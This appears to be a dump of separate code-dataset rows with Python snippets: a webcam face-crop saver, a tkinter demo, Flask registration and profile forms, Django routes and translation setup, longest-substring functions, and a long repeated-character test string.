cap = cv2.VideoCapture(0)
max_faces = 10
scale_fact = 1.0  # >1.0 enlarges the saved crop around the detected face

while count_faces < max_faces:
    key = cv2.waitKey(1)
    ret, frame = cap.read()
    if not ret:
        break  # camera unavailable / stream ended; avoid crashing cvtColor

    imgGray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
    imgGray = cv2.equalizeHist(imgGray)
    faces = face_cascade.detectMultiScale(imgGray, 1.3, 5)

    for (x, y, w, h) in faces:
        frame = cv2.rectangle(frame, (x, y), (x + w, y + h), (255, 0, 0), 2)
        # BUG FIX: scale_fact is a float, so the original slice bounds were
        # floats, and NumPy raises TypeError on non-integer slice indices.
        # Cast every bound to int explicitly.
        xinit = int(x - (w * (scale_fact - 1)))
        yinit = int(y - (h * (scale_fact - 1)))
        crop_img = imgGray[yinit:yinit + int(h * scale_fact), xinit:xinit + int(w * scale_fact)]
        cv2.imshow('teste', crop_img)
        if key & 0xFF == ord('w'):
            cv2.imwrite(database_path + str(count_faces) + '.pgm', crop_img)
            print("IMAGE SAVE: " + str(count_faces))
            count_faces += 1

    cv2.imshow('img', frame)
    if key & 0xFF == ord('q'):
        break

cap.release()
cv2.destroyAllWindows()
|
24,184 | 86aa6152fedbd5065d795bb14c313cee21323828 | # exemplo com labels e botões funcionais
from tkinter import *
# Callback executed when the button is clicked.
def bt_click():
    print('bt_click')
    # Update the 'text' attribute of the Label referenced by lb.
    lb['text'] = 'Funciona'
janela = Tk()
# Create a button; command= binds the function to run on click.
bt = Button(janela, width=20, text='OK', command=bt_click)
# Position the button with absolute coordinates.
bt.place(x=100, y=100)
# Create a label and keep a reference in lb so the callback can change it.
lb = Label(janela, text='Teste')
# Position the label.
lb.place(x=100, y=150)
# 300x300-pixel window at screen offset (200, 200).
janela.geometry('300x300+200+200')
janela.mainloop()
|
24,185 | f4c4350a39ae3231bf69c1ff0e5cc5c9d1bde304 | 'exam3[0].out[0]',[0,17],
|
24,186 | 9a4d28be52d3b610f77816be416c23658bffcf61 | from project.students.models import Student
from flask_wtf import FlaskForm
from flask_wtf.file import FileField, FileAllowed
from wtforms import StringField, SubmitField, PasswordField, validators, TextAreaField
class SignUp(FlaskForm):
    """Registration form; rejects e-mail addresses already registered."""

    fname = StringField('First Name:', validators=[validators.InputRequired()])
    lname = StringField('Last Name:', validators=[validators.InputRequired()])
    uname = StringField('Username:', validators=[validators.InputRequired()])
    email = StringField('Email:', validators=[validators.InputRequired(), validators.Email()])
    password = PasswordField(
        'Password:',
        validators=[
            validators.InputRequired(),
            validators.EqualTo('repassword', message='Passwords must match'),
        ],
    )
    repassword = PasswordField('Confirm Password:')
    submit = SubmitField('Sign Up')

    def validate_email(self, email):
        # Inline WTForms validator (runs automatically for the email field):
        # refuse any address that already belongs to a Student.
        if Student.query.filter_by(email=email.data).first() is not None:
            raise validators.ValidationError('Please use a different email address.')
class LogIn(FlaskForm):
    """Credentials form for signing in (e-mail + password)."""

    email = StringField('Email:', validators=[validators.InputRequired(), validators.Email()])
    password = PasswordField('Password', validators=[validators.InputRequired()])
    submit = SubmitField('Log In')
class ChangeBasic(FlaskForm):
    """Profile form for editing first/last name and bio; every field is
    optional (no validators attached)."""
    firstname = StringField('First Name')
    lastname = StringField('Last Name')
    bio = TextAreaField('Bio')
    submit = SubmitField('Submit')
class ChangeDP(FlaskForm):
    """Form for uploading a new profile picture (jpg/png/jpeg only)."""
    picture = FileField('Update Profile Picture: ', validators=[FileAllowed(['jpg', 'png', 'jpeg'])])
    submit = SubmitField('Update')
class ChangePassword(FlaskForm):
    """Password-change form: old, new and confirmation password.

    NOTE(review): the field labels 'Op'/'Np'/'Cp' are cryptic; presumably
    the template supplies friendlier text -- confirm before renaming them.
    """
    oldpassword = PasswordField('Op', [ validators.InputRequired() ])
    newpassword = PasswordField('Np', [ validators.InputRequired() ])
    confirmpassword = PasswordField('Cp', [ validators.InputRequired() ])
    submit = SubmitField('Submit')
class Deactivate(FlaskForm):
    """Account-deactivation form: requires the current password to confirm."""
    confirmpassword = PasswordField('confirm', [ validators.InputRequired() ])
    submit = SubmitField('Submit')
24,187 | b7b3688127fe36c46431b234250a1ed3d6d3f527 | from modeltranslation.translator import TranslationOptions, translator
from rating.models import Rating
# django-modeltranslation configuration: expose Rating's "name" and
# "description" fields for per-language translated columns.
class RatingTranslationOptions(TranslationOptions):
    fields = ["name", "description"]
translator.register(Rating, RatingTranslationOptions)
|
24,188 | e998092125b5023c1581c6c8f7ab19eb6b196a08 | print(dir())
#var1 = 90
#var = 90 #use with both combination of import
# Demo: show how 'from mod1 import *' changes the current namespace.
print(dir())  # names in scope BEFORE importing mod1
#import mod1
from mod1 import *
print(dir())  # after the star-import: mod1's public names now appear here
24,189 | ecef91cc9b17faaa6511522a070409d19f4a030a | from django.contrib import admin
from django.urls import path
from auth import views
# URL routes: Django admin plus class-based login/logout endpoints.
urlpatterns = [
    path('admin/', admin.site.urls),
    path('login/', views.Loginkar.as_view()),    # session login view
    path('logout/', views.Logoutkar.as_view()),  # session logout view
]
def lengthOfLongestSubstring(s):
    """
    :type s: str
    :rtype: str

    Despite the name, returns the longest SUBSTRING of s without repeating
    characters (not its length); ties go to the earlier substring.
    Recursive: on the first repeated character, either the repeat-free
    prefix wins or the answer lies after the earlier occurrence.
    """
    for i in range(1, len(s)):
        for j in range(i):
            if s[i] != s[j]:
                continue
            # s[i] repeats s[j]: compare the best answer starting after j
            # against the repeat-free prefix s[:i] (whose length is i).
            tail_best = lengthOfLongestSubstring(s[j + 1:])
            return tail_best if len(tail_best) > i else s[:i]
    return s
def lengthOfLongestSubstring2(s):
    """Iterative variant: return the longest repeat-free substring of s.

    Maintains a window start; when s[i] repeats a character inside the
    window, the current window is recorded as a candidate and the window
    restarts just past the earlier occurrence. The final comparison picks
    between the best recorded candidate and the trailing window.
    """
    best_text, best_len = s, 0  # sentinel mirrors the original (s, 0)
    start = 0                   # left edge of the current repeat-free window
    i = 1
    while i < len(s):
        j = start
        while j < i:
            if s[i] == s[j]:
                if best_len <= i - start:
                    best_text, best_len = s[start:i], i - start
                # Restart the window just past the earlier occurrence;
                # the outer i += 1 then resumes scanning from start + 1.
                start = j + 1
                i = start
                break
            j += 1
        i += 1
    return best_text if best_len > len(s) - start else s[start:]
new_str="""abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ ab
cdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcde
fghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefgh
ijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijk
lmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmn
opqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopq
rstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrst
uvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvw
xyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABC
DEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEF
GHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHI
JKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKL
MNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNO
PQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQR
STUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTU
VWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWX
YZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0
123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123
456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456
789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789
!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"
#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%
&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'(
)*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+
,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-.
/:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;
<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>
?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[
\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]
^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`
{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}
~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ a
bcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcd
efghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefg
hijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghij
klmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklm
nopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnop
qrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrs
tuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuv
wxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxy
zABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzAB
CDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDE
FGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGH
IJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJK
LMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMN
OPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQ
RSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRST
UVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVW
XYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ
0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ012
3456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ012345
6789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ012345678
9!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\
"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$
%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'
()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*
+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-
./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:
;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=
>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@
[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\
]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_
`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|
}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~
abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abc
defghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdef
ghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghi
jklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijkl
mnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmno
pqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqr
stuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstu
vwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwx
yzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzA
BCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCD
EFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFG
HIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJ
KLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLM
NOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOP
QRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRS
TUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUV
WXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXY
Z0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ01
23456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ01234
56789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ01234567
89!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!
\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#
$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&
'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()
*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,
-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./
:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<
=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?
@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\
\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^
_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{
|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~
abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ ab
cdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcde
fghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefgh
ijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijk
lmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmn
opqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopq
rstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrst
uvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvw
xyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABC
DEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEF
GHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHI
JKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKL
MNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNO
PQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQR
STUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTU
VWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWX
YZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0
123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123
456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456
789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789
!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"
#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%
&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'(
)*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+
,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-.
/:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;
<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>
?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[
\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]
^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`
{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}
~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ a
bcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcd
efghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefg
hijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghij
klmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklm
nopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnop
qrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrs
tuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuv
wxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxy
